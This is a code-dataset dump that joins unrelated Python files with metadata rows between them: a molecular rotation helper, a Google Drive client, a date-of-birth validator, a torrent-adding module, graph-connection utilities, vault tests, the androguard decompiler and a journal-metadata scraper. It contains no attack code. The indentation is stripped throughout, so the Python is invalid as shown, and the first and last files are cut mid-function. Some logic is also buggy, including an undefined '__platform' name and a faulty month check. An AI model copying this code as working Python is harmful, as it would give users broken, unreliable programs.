"""Returns the moment of intertia
"""
I = 0.
atom_p = atoms.get_positions()
atom_m = atoms.get_masses()
for ap, am in zip(atom_p, atom_m):
I += sum(np.cross(r_rot, ap-x0)**2.)*am
return I
def calculate_rot_mode(atoms, base_pos, rot_axis, branch_arr,
mass_weight=True, normalize=True):
""" Calculates the rotation mode for specified branch.
Each atom in the branch rotates around the given rotation axis,
which is perpendicular to the rotation axis and the radial vector:
v_rot = v_axis cross (B->A)
v_rot are weighted by distance from center of axis
v_rot are also transformed into mass-weighted coordinates
"""
ap = atoms.get_positions()
v_zero = np.zeros(3*len(ap))
v_rot = v_zero.reshape(-1, 3)
BC = rot_axis/np.linalg.norm(rot_axis)
# For each atom find vector and weight to rotation axis
for i in branch_arr:
BA = np.array(ap[i])-np.array(base_pos)
BA = BA - np.dot(BA, BC)
v_rot[i] = np.cross(BC, BA)
v_rot = np.ravel(v_rot)
if mass_weight:
v_rot = to_massweight_coor(v_rot, atoms)
if normalize:
v_rot = v_rot / np.linalg.norm(v_rot)
return v_rot
def rotatepoints(rotationcenter, rotationaxis, angle, atompos):
"""
Rotate some coordinates
See http://en.wikipedia.org/wiki/Rotation_matrix
Args:
rotationcenter (numpy array): center for rotation
rotationaxis (numpy array): axis to rotate around
angle (float): angle to rotate in radians
atompos (numpy array): positions to rotate
"""
x0 = np.matrix(rotationcenter)
u = np.matrix(rotationaxis)
ap = np.matrix(atompos)
natoms = ap.shape[0]
rp = np.zeros([natoms, 3])
R = np.matrix([
[
np.cos(angle)+u[0, 1]**2*(1.-np.cos(angle)),
u[0, 1]*u[0, 1]*(1.-np.cos(angle))-u[0, 2]*np.sin(angle),
u[0, 1]*u[0, 2]*(1.-np.cos(angle))+u[0, 1]*np.sin(angle)],
[
u[0, 1]*u[0, 0]*(1.-np.cos(angle))+u[0, 2]*np.sin(angle),
np.cos(angle)+u[0, 1]**2*(1.-np.cos(angle)),
u[0, 1]*u[0, 2]*(1.-np.cos(angle))-u[0, 0]*np.sin(angle)],
[
u[0, 2]*u[0, 0]*(1.-np.cos(angle))-u[0, 1]*np.sin(angle),
u[0, 2]*u[0, 1]*(1.-np.cos(angle))+u[0, 0]*np.sin(angle),
np.cos(angle)+u[0, 2]**2*(1.-np.cos(angle))]])
# Repeat center coordinate natoms rows
x0 = np.tile(x0, [natoms, 1])
# Vectors from rot center for all atoms
ap = ap - x0
# Apply rotation transformation
rp = np.dot(R, ap.T)
# Adding the offset
rp = rp.T + x0
return rp
| lgpl-2.1 | -1,891,834,102,752,844,000 | 30.734694 | 72 | 0.587567 | false | 3.173469 | false | false | false |
guillaume-chs/Drive-in-Line | gdrive/gdrive_client.py | 1 | 2704 | #!/usr/bin/python
import sys
from sys import platform as _platform
sys.argv = ['']
import os.path
import subprocess
from gdrive.pydrive.auth import GoogleAuth
from gdrive.pydrive.drive import GoogleDrive
file_type = {
'folder': 'application/vnd.google-apps.folder'
}
class GoogleDriveClient():
def __init__(self):
print("Google Drive client, written in Python by G. Chanson")
def connect(self):
gauth = GoogleAuth()
gauth.LocalWebserverAuth()
self.drive = GoogleDrive(gauth)
def list_dir_files(self, dir_id='root'):
query = "'%s' in parents and trashed=false" % dir_id
files = self.drive.ListFile({'q': query})
return files.GetList()
def list_trash_files(self):
query = "trashed=true"
files = self.drive.ListFile({'q': query})
return files.GetList()
def download_file(self, fileId, file_name=None):
if file_name is not None:
if os.path.isfile(file_name):
print('File already exists at %s' % file_name)
return file_name
file = self.drive.CreateFile({'id': fileId})
if file_name is None:
file_name = file['title']
file.GetContentFile(file_name)
print('Downloaded file %s to %s' % (file['title'], file_name))
return file_name
def upload_file(self, filename):
file = self.drive.CreateFile()
file.SetContentFile(filename)
tmp = filename.split('/')
file["title"] = tmp[-1]
file.Upload()
print('Uploaded %s' % file["title"])
def trash_file(self, fileId):
file = self.drive.CreateFile({'id': fileId})
file.Trash()
print('Trashed file %s' % file['title'])
def untrash_file(self, fileId):
file = self.drive.CreateFile({'id': fileId})
file.UnTrash()
print('UnTrashed file %s' % file['title'])
def delete_file(self, fileId):
file = self.drive.CreateFile({'id': fileId})
file.Delete()
print('Deleted file %s' % file['title'])
def rename_file(self, fileId, file_name):
file = self.drive.CreateFile({'id': fileId})
file['title'] = file_name
file.Upload()
print('Uploaded file %s' % file['title'])
def open_file(self, fileId):
file_path = self.download_file(fileId, '/tmp/' + fileId)
if _platform == "linux" or __platform == "linux2":
subprocess.call(['xdg-open', file_path])
elif _platform == "darwin":
subprocess.call(['open', file_path])
elif _platform == "win32":
subprocess.call(['start', file_path])
gdrive = GoogleDriveClient()
| gpl-3.0 | -44,829,841,352,414,264 | 27.166667 | 70 | 0.58432 | false | 3.644205 | false | false | false |
jacobwarduk/py-validate-dob | validate_dob.py | 1 | 1088 | #!/usr/bin/env python
import calendar
from datetime import date
from time import strptime
# Function to validate DOB input
# validate_dob("1985", "November", "18")
def validate_dob(y, m, d):
# Validating year
try:
if len(y) == 4 and not int(y) > date.today().year: # Year length must be 4 digits and be in the past
year = True
else:
year = False
except ValueError:
year = False
# Validating month
try:
for n in calendar.month_name: # Checking to see if user inputted month is in calendar
if m == n:
month = True
break
else:
month = False
except ValueError:
month = False;
# Validating day
try:
validDays = calendar.monthrange(int(y), strptime(m[0:3], "%b").tm_mon) # Getting valid number of days for specified month/year from the calendar
if int(d) > 0 and int(d) <= validDays[1]: # Checking to see if user inputted day is valid
day = True
else:
day = False
except ValueError:
day = False
# Checking if year, month and date are all valid
if True == year and True == month and True == day:
return True
else:
return False
| mit | -6,511,953,825,184,032,000 | 23.177778 | 146 | 0.676471 | false | 3.090909 | false | false | false |
karamanolev/WhatManager2 | myanonamouse/manage_mam.py | 3 | 2210 | import base64
import os
import os.path
from django.db import transaction
from WhatManager2.locking import LockModelTables
from WhatManager2.utils import norm_t_torrent
from home.models import ReplicaSet, DownloadLocation, TorrentAlreadyAddedException
from myanonamouse.models import MAMTorrent, MAMTransTorrent
def add_mam_torrent(torrent_id, instance=None, location=None, mam_client=None,
add_to_client=True):
mam_torrent = MAMTorrent.get_or_create(mam_client, torrent_id)
if not instance:
instance = ReplicaSet.get_myanonamouse_master().get_preferred_instance()
if not location:
location = DownloadLocation.get_myanonamouse_preferred()
with LockModelTables(MAMTransTorrent):
try:
MAMTransTorrent.objects.get(info_hash=mam_torrent.info_hash)
raise TorrentAlreadyAddedException(u'Already added.')
except MAMTransTorrent.DoesNotExist:
pass
download_dir = os.path.join(location.path, unicode(mam_torrent.id))
def create_b_torrent():
new_b_torrent = MAMTransTorrent(
instance=instance,
location=location,
mam_torrent=mam_torrent,
info_hash=mam_torrent.info_hash,
)
new_b_torrent.save()
return new_b_torrent
if add_to_client:
with transaction.atomic():
b_torrent = create_b_torrent()
t_torrent = instance.client.add_torrent(
base64.b64encode(mam_torrent.torrent_file),
download_dir=download_dir,
paused=False
)
t_torrent = instance.client.get_torrent(
t_torrent.id, arguments=MAMTransTorrent.sync_t_arguments)
if not os.path.exists(download_dir):
os.mkdir(download_dir)
if not os.stat(download_dir).st_mode & 0777 == 0777:
os.chmod(download_dir, 0777)
norm_t_torrent(t_torrent)
b_torrent.sync_t_torrent(t_torrent)
else:
b_torrent = create_b_torrent()
return b_torrent
| mit | -4,014,386,551,576,631,300 | 34.645161 | 82 | 0.604072 | false | 4.003623 | false | false | false |
Silmathoron/NNGT | nngt/lib/connect_tools.py | 1 | 12235 | #!/usr/bin/env python
#-*- coding:utf-8 -*-
""" Generation tools for NNGT """
import logging
import numpy as np
import scipy.sparse as ssp
from scipy.spatial.distance import cdist
from numpy.random import randint
import nngt
from nngt.lib import InvalidArgument, nonstring_container
from nngt.lib.logger import _log_message
logger = logging.getLogger(__name__)
__all__ = [
"_check_num_edges",
"_compute_connections",
"_filter",
"_no_self_loops",
"_set_degree_type",
"_set_options",
"_unique_rows",
"dist_rule",
"max_proba_dist_rule"
]
def _set_options(graph, population, shape, positions):
''' Make a graph a network or spatial '''
if population is not None:
nngt.Graph.make_network(graph, population)
if shape is not None or positions is not None:
nngt.Graph.make_spatial(graph, shape, positions)
def _compute_connections(num_source, num_target, density, edges, avg_deg,
directed, reciprocity=-1):
assert (density, edges, avg_deg) != (None, None, None), \
"At leat one of the following entries must be specified: 'density', " \
"'edges', 'avg_deg'."
pre_recip_edges = 0
if avg_deg is not None:
pre_recip_edges = int(avg_deg * num_source)
elif edges is not None:
pre_recip_edges = int(edges)
else:
pre_recip_edges = int(density * num_source * num_target)
dens = pre_recip_edges / float(num_source * num_target)
edges = pre_recip_edges
if edges:
if reciprocity > max(0,(2.-1./dens)):
frac_recip = ((reciprocity - 1.
+ np.sqrt(1. + dens*(reciprocity - 2.))) /
(2. - reciprocity))
if frac_recip < 1.:
pre_recip_edges = int(edges/(1+frac_recip))
else:
raise InvalidArgument(
"Such reciprocity cannot be obtained, request ignored.")
elif reciprocity > 0.:
raise InvalidArgument(
"Reciprocity cannot be lower than 2-1/density.")
return edges, pre_recip_edges
def _check_num_edges(source_ids, target_ids, num_edges, directed, multigraph,
return_sets=False):
num_source, num_target = len(source_ids), len(target_ids)
source_set, target_set = None, None
has_only_one_population = (num_source == num_target)
if has_only_one_population:
source_set = set(source_ids)
target_set = set(target_ids)
has_only_one_population = (source_set == target_set)
if not has_only_one_population and not multigraph:
b_d = (num_edges > num_source*num_target)
b_nd = (num_edges > int(0.5*num_source*num_target))
if (not directed and b_nd) or (directed and b_d):
raise InvalidArgument("Required number of edges is too high")
elif has_only_one_population and not multigraph:
b_d = (num_edges > num_source*(num_target-1))
b_nd = (num_edges > int(0.5*(num_source-1)*num_target))
if (not directed and b_nd) or (directed and b_d):
raise InvalidArgument("Required number of edges is too high")
if return_sets:
return has_only_one_population, source_set, target_set
return has_only_one_population
def _set_degree_type(degree_type):
deg_map = {
"in-degree": "in", "out-degree": "out", "total-degree": "total",
"in": "in", "out": "out", "total": "total"
}
try:
degree_type = deg_map[degree_type]
except KeyError:
raise ValueError("`degree_type` must be either 'in', 'out', 'total', "
"or the full version 'in-degree', 'out-degree', "
"'total-degree'.")
return degree_type
# ------------------------- #
# Edge checks and filtering #
# ------------------------- #
def _unique_rows(arr, return_index=False):
'''
Keep only unique edges
'''
b = np.ascontiguousarray(arr).view(
np.dtype((np.void, arr.dtype.itemsize * arr.shape[1])))
b, idx = np.unique(b, return_index=True)
unique = b.view(arr.dtype).reshape(-1, arr.shape[1]).astype(int)
if return_index:
return unique, idx
return unique
def _no_self_loops(array, return_test=False):
'''
Remove self-loops
'''
test = array[:, 0] != array[:, 1]
if return_test:
return array[test, :].astype(int), test
return array[test, :].astype(int)
def _filter(ia_edges, ia_edges_tmp, num_ecurrent, edges_hash, b_one_pop,
multigraph, directed=True, recip_hash=None, distance=None,
dist_tmp=None):
'''
Filter the edges: remove self loops and multiple connections if the graph
is not a multigraph.
'''
if b_one_pop:
ia_edges_tmp, test = _no_self_loops(ia_edges_tmp, return_test=True)
if dist_tmp is not None:
dist_tmp = dist_tmp[test]
if not multigraph:
num_ecurrent = len(edges_hash)
if distance is not None:
for e, d in zip(ia_edges_tmp, dist_tmp):
tpl_e = tuple(e)
if tpl_e not in edges_hash:
if directed or tpl_e not in recip_hash:
ia_edges[num_ecurrent] = e
distance.append(d)
edges_hash.add(tpl_e)
if not directed:
recip_hash.add(tpl_e[::-1])
num_ecurrent += 1
else:
for e in ia_edges_tmp:
tpl_e = tuple(e)
if tpl_e not in edges_hash:
if directed or tpl_e not in recip_hash:
ia_edges[num_ecurrent] = e
edges_hash.add(tpl_e)
if not directed:
recip_hash.add(tpl_e[::-1])
num_ecurrent += 1
else:
num_added = len(ia_edges_tmp)
ia_edges[num_ecurrent:num_ecurrent + num_added, :] = ia_edges_tmp
num_ecurrent += num_added
if distance is not None:
distance.extend(dist_tmp)
return ia_edges, num_ecurrent
def _cleanup_edges(g, edges, attributes, duplicates, loops, existing, ignore):
'''
Cleanup an list of edges.
'''
loops_only = loops and not (duplicates or existing)
new_edges = None
new_attr = {}
directed = g.is_directed()
if loops_only:
edges = np.asarray(edges)
new_edges, test = _no_self_loops(edges, return_test=True)
if len(new_edges) != len(edges):
if ignore:
_log_message(logger, "WARNING",
"Self-loops ignored: {}.".format(edges[~test]))
else:
raise InvalidArgument(
"Self-loops are present: {}.".format(edges[~test]))
new_attr = {k: np.asarray(v)[test] for v, k in attributes.items()}
else:
# check (also) either duplicates or existing
new_attr = {key: [] for key in attributes}
edge_set = set()
new_edges = []
if existing:
edge_set = {tuple(e) for e in g.edges_array}
for i, e in enumerate(edges):
tpl_e = tuple(e)
if tpl_e in edge_set or (not directed and tpl_e[::-1] in edge_set):
if ignore:
_log_message(logger, "WARNING",
"Existing edge {} ignored.".format(tpl_e))
else:
raise InvalidArgument(
"Edge {} already exists.".format(tpl_e))
elif loops and e[0] == e[1]:
if ignore:
_log_message(logger, "WARNING",
"Self-loop on {} ignored.".format(e[0]))
else:
raise InvalidArgument("Self-loop on {}.".format(e[0]))
else:
edge_set.add(tpl_e)
new_edges.append(tpl_e)
if not directed:
edge_set.add(tpl_e[::-1])
for k, vv in attributes.items():
if nonstring_container(vv):
new_attr[k].append(vv[i])
else:
new_attr[k].append(vv)
new_edges = np.asarray(new_edges)
return new_edges, new_attr
# ------------- #
# Distance rule #
# ------------- #
def dist_rule(rule, scale, pos_src, pos_targets, dist=None):
'''
DR test from one source to several targets
Parameters
----------
rule : str
Either 'exp', 'gaussian', or 'lin'.
scale : float
Characteristic scale.
pos_src : array of shape (2, N)
Positions of the sources.
pos_targets : array of shape (2, N)
Positions of the targets.
dist : list, optional (default: None)
List that will be filled with the distances of the edges.
Returns
-------
Array of size N giving the probability of the edges according to the rule.
'''
vect = pos_targets - pos_src
origin = np.array([(0., 0.)])
# todo correct this
dist_tmp = np.squeeze(cdist(vect.T, origin), axis=1)
if dist is not None:
dist.extend(dist_tmp)
if rule == 'exp':
return np.exp(np.divide(dist_tmp, -scale))
elif rule == 'gaussian':
return np.exp(-0.5*np.square(np.divide(dist_tmp, scale)))
elif rule == 'lin':
return np.divide(scale - dist_tmp, scale).clip(min=0.)
else:
raise InvalidArgument('Unknown rule "' + rule + '".')
def max_proba_dist_rule(rule, scale, max_proba, pos_src, pos_targets,
dist=None):
'''
DR test from one source to several targets
Parameters
----------
rule : str
Either 'exp', 'gaussian', or 'lin'.
scale : float
Characteristic scale.
norm : float
Normalization factor giving proba at zero distance.
pos_src : 2-tuple
Positions of the sources.
pos_targets : array of shape (2, N)
Positions of the targets.
dist : list, optional (default: None)
List that will be filled with the distances of the edges.
Returns
-------
Array of size N giving the probability of the edges according to the rule.
'''
x, y = pos_src
s = np.repeat([[x], [y]], pos_targets.shape[1], axis=1)
vect = pos_targets - np.repeat([[x], [y]], pos_targets.shape[1], axis=1)
origin = np.array([(0., 0.)])
# todo correct this
dist_tmp = np.squeeze(cdist(vect.T, origin), axis=1)
if dist is not None:
dist.extend(dist_tmp)
if rule == 'exp':
return max_proba*np.exp(np.divide(dist_tmp, -scale))
elif rule == 'gaussian':
return max_proba*np.exp(-0.5*np.square(np.divide(dist_tmp, scale)))
elif rule == 'lin':
return max_proba*np.divide(scale - dist_tmp, scale).clip(min=0.)
else:
raise InvalidArgument('Unknown rule "' + rule + '".')
def _set_dist_new_edges(new_attr, graph, edge_list):
''' Add the distances to the edge attributes '''
if graph.is_spatial() and "distance" not in new_attr:
if len(edge_list) == 1:
positions = graph.get_positions(list(edge_list[0]))
new_attr["distance"] = cdist([positions[0]], [positions[1]])[0][0]
else:
positions = graph.get_positions()
mat = cdist(positions, positions)
distances = [mat[e[0], e[1]] for e in edge_list]
new_attr["distance"] = distances
def _set_default_edge_attributes(g, attributes, num_edges):
''' Set default edge attributes values '''
for k in g.edge_attributes:
skip = k in ("weight", "distance", "delay")
if k not in attributes:
dtype = g.get_attribute_type(k)
if dtype == "string":
attributes[k] = ["" for _ in range(num_edges)]
elif dtype == "double" and not skip:
attributes[k] = [np.NaN for _ in range(num_edges)]
elif dtype == "int":
attributes[k] = [0 for _ in range(num_edges)]
elif not skip:
attributes[k] = [None for _ in range(num_edges)]
| gpl-3.0 | -3,961,071,279,036,299,300 | 30.861979 | 79 | 0.545157 | false | 3.676382 | true | false | false |
pjox/scientific-programming | Parcial 1/PedroJavierOrtiz.py | 1 | 1188 | import math
def Interlace_Iter(L1, L2):
L3=[]
for i in range(min(len(L1),len(L2))):
L3.append(L1[i])
L3.append(L2[i])
if len(L1) < len(L2):
L3=L3+L2[len(L1):]
elif len(L2) < len(L1):
L3=L3+L1[len(L2):]
return L3
def Interlace_Rec(L1,L2):
L4=[]
def Recursive_Part(L1,L2,L4):
if len(L1)==0 or len(L2)==0:
if len(L1) < len(L2):
L4=L4+L2[:]
elif len(L2) < len(L1):
L4=L4+L1[:]
print L4
else:
L4.append(L1[0])
L4.append(L2[0])
L1.pop(0)
L2.pop(0)
Recursive_Part(L1,L2,L4)
return Recursive_Part(L1,L2,L4)
def IntLog(n,b):
e=0
while b**e < n:
e=e+1
if b**e > n:
e-=1
return e
def g(x):
return (0.5)*(x+(2.0/x))
def PuntoFijo(a, epsilon, N): #La funcion g esta definida arriba
n=1
x0=float(a)
x1=g(x0)
dif = abs(x0-x1)
while n <= N and dif > epsilon:
x0=x1
x1=g(x1)
dif = abs(x0-x1)
n+=1
if n > N:
n-=1
x_ultimo = x1
return x_ultimo, dif, n
def CribaEratostenes(n):
criba=[False,False]+[True]*(n-1)
i = 2
while i <= math.sqrt(n):
j=2
if criba[i]== True:
while i*j <= n:
criba[i*j]=False
j+=1
i+=1
prime=[]
for k in range(len(criba)):
if criba[k]==True:
prime.append(k)
return prime
| mit | -4,420,393,802,670,555,000 | 15.732394 | 64 | 0.569865 | false | 1.797277 | false | false | false |
mozilla-iam/cis | python-modules/cis_identity_vault/tests/test_vault.py | 1 | 1707 | import os
import random
import subprocess
from moto import mock_dynamodb2
@mock_dynamodb2
class TestVault(object):
def test_crud_it_should_succeed(self):
from cis_identity_vault import vault
v = vault.IdentityVault()
os.environ["CIS_ENVIRONMENT"] = "purple"
os.environ["CIS_REGION_NAME"] = "us-east-1"
os.environ["DEFAULT_AWS_REGION"] = "us-east-1"
v.connect()
result = v.find_or_create()
assert result is not None
result = v.destroy()
assert result["ResponseMetadata"]["HTTPStatusCode"] == 200
class TestVaultDynalite(object):
def setup_class(self):
self.dynalite_port = str(random.randint(32000, 34000))
os.environ["CIS_DYNALITE_PORT"] = self.dynalite_port
self.dynaliteprocess = subprocess.Popen(
[
"/usr/sbin/java",
"-Djava.library.path=/opt/dynamodb_local/DynamoDBLocal_lib",
"-jar",
"/opt/dynamodb_local/DynamoDBLocal.jar",
"-inMemory",
"-port",
self.dynalite_port,
],
preexec_fn=os.setsid,
)
def test_create_using_dynalite(self):
os.environ["CIS_ENVIRONMENT"] = "local"
os.environ["CIS_DYNALITE_PORT"] = self.dynalite_port
os.environ["CIS_REGION_NAME"] = "us-east-1"
from cis_identity_vault import vault
v = vault.IdentityVault()
v.connect()
result = v.find_or_create()
assert result is not None
result = v.find_or_create()
assert result is not None
def teardown_class(self):
os.killpg(os.getpgid(self.dynaliteprocess.pid), 15)
| mpl-2.0 | 54,099,992,054,255,350 | 30.611111 | 76 | 0.585237 | false | 3.57113 | false | false | false |
dandycheung/androguard | androguard/decompiler/dad/decompile.py | 33 | 12763 | # This file is part of Androguard.
#
# Copyright (c) 2012 Geoffroy Gueguen <geoffroy.gueguen@gmail.com>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('./')
import logging
from collections import defaultdict
import androguard.core.androconf as androconf
import androguard.decompiler.dad.util as util
from androguard.core.analysis import analysis
from androguard.core.bytecodes import apk, dvm
from androguard.decompiler.dad.control_flow import identify_structures
from androguard.decompiler.dad.dataflow import (build_def_use,
place_declarations,
dead_code_elimination,
register_propagation,
split_variables)
from androguard.decompiler.dad.graph import construct
from androguard.decompiler.dad.instruction import Param, ThisParam
from androguard.decompiler.dad.writer import Writer
def auto_vm(filename):
ret = androconf.is_android(filename)
if ret == 'APK':
return dvm.DalvikVMFormat(apk.APK(filename).get_dex())
elif ret == 'DEX':
return dvm.DalvikVMFormat(open(filename, 'rb').read())
elif ret == 'ODEX':
return dvm.DalvikOdexVMFormat(open(filename, 'rb').read())
return None
class DvMethod():
def __init__(self, methanalysis):
method = methanalysis.get_method()
self.start_block = next(methanalysis.get_basic_blocks().get(), None)
self.cls_name = method.get_class_name()
self.name = method.get_name()
self.lparams = []
self.var_to_name = defaultdict()
self.writer = None
self.graph = None
self.access = util.get_access_method(method.get_access_flags())
desc = method.get_descriptor()
self.type = desc.split(')')[-1]
self.params_type = util.get_params_type(desc)
self.exceptions = methanalysis.exceptions.exceptions
code = method.get_code()
if code is None:
logger.debug('No code : %s %s', self.name, self.cls_name)
else:
start = code.registers_size - code.ins_size
if 'static' not in self.access:
self.var_to_name[start] = ThisParam(start, self.name)
self.lparams.append(start)
start += 1
num_param = 0
for ptype in self.params_type:
param = start + num_param
self.lparams.append(param)
self.var_to_name[param] = Param(param, ptype)
num_param += util.get_type_size(ptype)
if not __debug__:
from androguard.core import bytecode
bytecode.method2png('/tmp/dad/graphs/%s#%s.png' % \
(self.cls_name.split('/')[-1][:-1], self.name), methanalysis)
def process(self):
logger.debug('METHOD : %s', self.name)
# Native methods... no blocks.
if self.start_block is None:
logger.debug('Native Method.')
self.writer = Writer(None, self)
self.writer.write_method()
return
graph = construct(self.start_block, self.var_to_name, self.exceptions)
self.graph = graph
if not __debug__:
util.create_png(self.cls_name, self.name, graph, '/tmp/dad/blocks')
use_defs, def_uses = build_def_use(graph, self.lparams)
split_variables(graph, self.var_to_name, def_uses, use_defs)
dead_code_elimination(graph, def_uses, use_defs)
register_propagation(graph, def_uses, use_defs)
place_declarations(graph, self.var_to_name, def_uses, use_defs)
del def_uses, use_defs
# After the DCE pass, some nodes may be empty, so we can simplify the
# graph to delete these nodes.
# We start by restructuring the graph by spliting the conditional nodes
# into a pre-header and a header part.
graph.split_if_nodes()
# We then simplify the graph by merging multiple statement nodes into
# a single statement node when possible. This also delete empty nodes.
graph.simplify()
graph.compute_rpo()
if not __debug__:
util.create_png(self.cls_name, self.name, graph,
'/tmp/dad/pre-structured')
identify_structures(graph, graph.immediate_dominators())
if not __debug__:
util.create_png(self.cls_name, self.name, graph,
'/tmp/dad/structured')
self.writer = Writer(graph, self)
self.writer.write_method()
del graph
def show_source(self):
print self.get_source()
def get_source(self):
if self.writer:
return '%s' % self.writer
return ''
def __repr__(self):
return 'Method %s' % self.name
class DvClass():
def __init__(self, dvclass, vma):
name = dvclass.get_name()
if name.find('/') > 0:
pckg, name = name.rsplit('/', 1)
else:
pckg, name = '', name
self.package = pckg[1:].replace('/', '.')
self.name = name[:-1]
self.vma = vma
self.methods = dict((meth.get_method_idx(), meth)
for meth in dvclass.get_methods())
self.fields = dict((field.get_name(), field)
for field in dvclass.get_fields())
self.subclasses = {}
self.code = []
self.inner = False
access = dvclass.get_access_flags()
# If interface we remove the class and abstract keywords
if 0x200 & access:
prototype = '%s %s'
if access & 0x400:
access -= 0x400
else:
prototype = '%s class %s'
self.access = util.get_access_class(access)
self.prototype = prototype % (' '.join(self.access), self.name)
self.interfaces = dvclass.interfaces
self.superclass = dvclass.get_superclassname()
logger.info('Class : %s', self.name)
logger.info('Methods added :')
for index, meth in self.methods.iteritems():
logger.info('%s (%s, %s)', index, self.name, meth.name)
logger.info('')
def add_subclass(self, innername, dvclass):
self.subclasses[innername] = dvclass
dvclass.inner = True
def get_methods(self):
return self.methods
def process_method(self, num):
methods = self.methods
if num in methods:
method = methods[num]
if not isinstance(method, DvMethod):
method.set_instructions([i for i in method.get_instructions()])
meth = methods[num] = DvMethod(self.vma.get_method(method))
meth.process()
method.set_instructions([])
else:
method.process()
else:
logger.error('Method %s not found.', num)
def process(self):
for klass in self.subclasses.values():
klass.process()
for meth in self.methods:
self.process_method(meth)
def get_source(self):
source = []
if not self.inner and self.package:
source.append('package %s;\n' % self.package)
if self.superclass is not None:
self.superclass = self.superclass[1:-1].replace('/', '.')
if self.superclass.split('.')[-1] == 'Object':
self.superclass = None
if self.superclass is not None:
self.prototype += ' extends %s' % self.superclass
if self.interfaces is not None:
interfaces = self.interfaces[1:-1].split(' ')
self.prototype += ' implements %s' % ', '.join(
[n[1:-1].replace('/', '.') for n in interfaces])
source.append('%s {\n' % self.prototype)
for name, field in sorted(self.fields.iteritems()):
access = util.get_access_field(field.get_access_flags())
f_type = util.get_type(field.get_descriptor())
source.append(' ')
if access:
source.append(' '.join(access))
source.append(' ')
if field.init_value:
value = field.init_value.value
if f_type == 'String':
value = '"%s"' % value
source.append('%s %s = %s;\n' % (f_type, name, value))
else:
source.append('%s %s;\n' % (f_type, name))
for klass in self.subclasses.values():
source.append(klass.get_source())
for _, method in self.methods.iteritems():
if isinstance(method, DvMethod):
source.append(method.get_source())
source.append('}\n')
return ''.join(source)
def show_source(self):
print self.get_source()
def __repr__(self):
if not self.subclasses:
return 'Class(%s)' % self.name
return 'Class(%s) -- Subclasses(%s)' % (self.name, self.subclasses)
class DvMachine():
def __init__(self, name):
vm = auto_vm(name)
if vm is None:
raise ValueError('Format not recognised: %s' % name)
self.vma = analysis.uVMAnalysis(vm)
self.classes = dict((dvclass.get_name(), dvclass)
for dvclass in vm.get_classes())
#util.merge_inner(self.classes)
def get_classes(self):
return self.classes.keys()
def get_class(self, class_name):
for name, klass in self.classes.iteritems():
if class_name in name:
if isinstance(klass, DvClass):
return klass
dvclass = self.classes[name] = DvClass(klass, self.vma)
return dvclass
def process(self):
for name, klass in self.classes.iteritems():
logger.info('Processing class: %s', name)
if isinstance(klass, DvClass):
klass.process()
else:
dvclass = self.classes[name] = DvClass(klass, self.vma)
dvclass.process()
def show_source(self):
for klass in self.classes.values():
klass.show_source()
def process_and_show(self):
for name, klass in sorted(self.classes.iteritems()):
logger.info('Processing class: %s', name)
if not isinstance(klass, DvClass):
klass = DvClass(klass, self.vma)
klass.process()
klass.show_source()
logger = logging.getLogger('dad')
sys.setrecursionlimit(5000)
def main():
# logger.setLevel(logging.DEBUG) for debugging output
# comment the line to disable the logging.
logger.setLevel(logging.INFO)
console_hdlr = logging.StreamHandler(sys.stdout)
console_hdlr.setFormatter(logging.Formatter('%(levelname)s: %(message)s'))
logger.addHandler(console_hdlr)
default_file = 'examples/android/TestsAndroguard/bin/TestActivity.apk'
if len(sys.argv) > 1:
machine = DvMachine(sys.argv[1])
else:
machine = DvMachine(default_file)
logger.info('========================')
logger.info('Classes:')
for class_name in sorted(machine.get_classes()):
logger.info(' %s', class_name)
logger.info('========================')
cls_name = raw_input('Choose a class: ')
if cls_name == '*':
machine.process_and_show()
else:
cls = machine.get_class(cls_name.decode('utf8'))
if cls is None:
logger.error('%s not found.', cls_name)
else:
logger.info('======================')
for method_id, method in cls.get_methods().items():
logger.info('%d: %s', method_id, method.name)
logger.info('======================')
meth = raw_input('Method: ')
if meth == '*':
logger.info('CLASS = %s', cls)
cls.process()
else:
cls.process_method(int(meth))
logger.info('Source:')
logger.info('===========================')
cls.show_source()
if __name__ == '__main__':
main()
| apache-2.0 | -8,862,995,910,666,431,000 | 34.851124 | 79 | 0.5599 | false | 3.997181 | false | false | false |
OAButton/tricorder | plugins/python/mdpi.py | 2 | 3568 | #!/usr/bin/env python2.6
import os, sys, re, urllib2, cookielib, string
from urllib import urlencode
from urllib2 import urlopen
from copy import copy
import BeautifulSoup
import htmlentitydefs
import html5lib
from html5lib import treebuilders
import warnings
import codecs
warnings.simplefilter("ignore",DeprecationWarning)
import socket
socket.setdefaulttimeout(15)
class ParseException(Exception):
pass
##
# Removes HTML or XML character references and entities from a text string.
#
# @param text The HTML (or XML) source text.
# @return The plain text, as a Unicode string, if necessary.
def unescape(text):
def fixup(m):
text = m.group(0)
if text[:2] == "&#":
# character reference
try:
if text[:3] == "&#x":
return unichr(int(text[3:-1], 16))
else:
return unichr(int(text[2:-1]))
except ValueError:
pass
else:
# named entity
try:
text = unichr(htmlentitydefs.name2codepoint[text[1:-1]])
except KeyError:
pass
return text # leave as is
#return re.sub("&#?\w+;", fixup, text).encode('utf-8')
return re.sub("&#?\w+;", fixup, text)
def meta(soup, key):
el = soup.find("meta", {'name':key})
if el:
return el['content'];
return None
def item(soup, entry, key):
el = meta(soup, key)
if el:
print "%s\t%s" % (entry, el)
def handle(url):
# http://www.mdpi.com/2072-4292/1/4/1139
m = re.match(r'http://www\.mdpi\.com/(\d{4}-\d{4}/\d+/\d+/\d+)', url)
if not m:
raise ParseException, "URL not supported %s" % url
wkey = m.group(1)
#u = codecs.getreader('utf-8')(urlopen(url))
#page = u.read()
page = urlopen(url).read()
parser = html5lib.HTMLParser(tree=treebuilders.getTreeBuilder("beautifulsoup"))
soup = parser.parse(page)
head = soup.find("head")
doi = meta(head, 'dc.identifier')
if not doi:
raise ParseException, "Cannot find DOI"
m = re.match(r'(?:doi:)?(.*)$', doi)
if not m:
raise ParseException, "Cannot find DOI"
doi = m.group(1)
print "begin_tsv"
print "linkout\tDOI\t\t%s\t\t" % (doi)
print "linkout\tMDPI\t\t%s\t\t" % wkey
print "type\tJOUR"
title = meta(head, "dc.title")
#if title:
# print "title\t%s" % unescape(title)
if title:
print "title\t%s" % title
item(head, "journal", "prism.publicationName")
item(head, "volume", "prism.volume")
item(head, "issue", "prism.number")
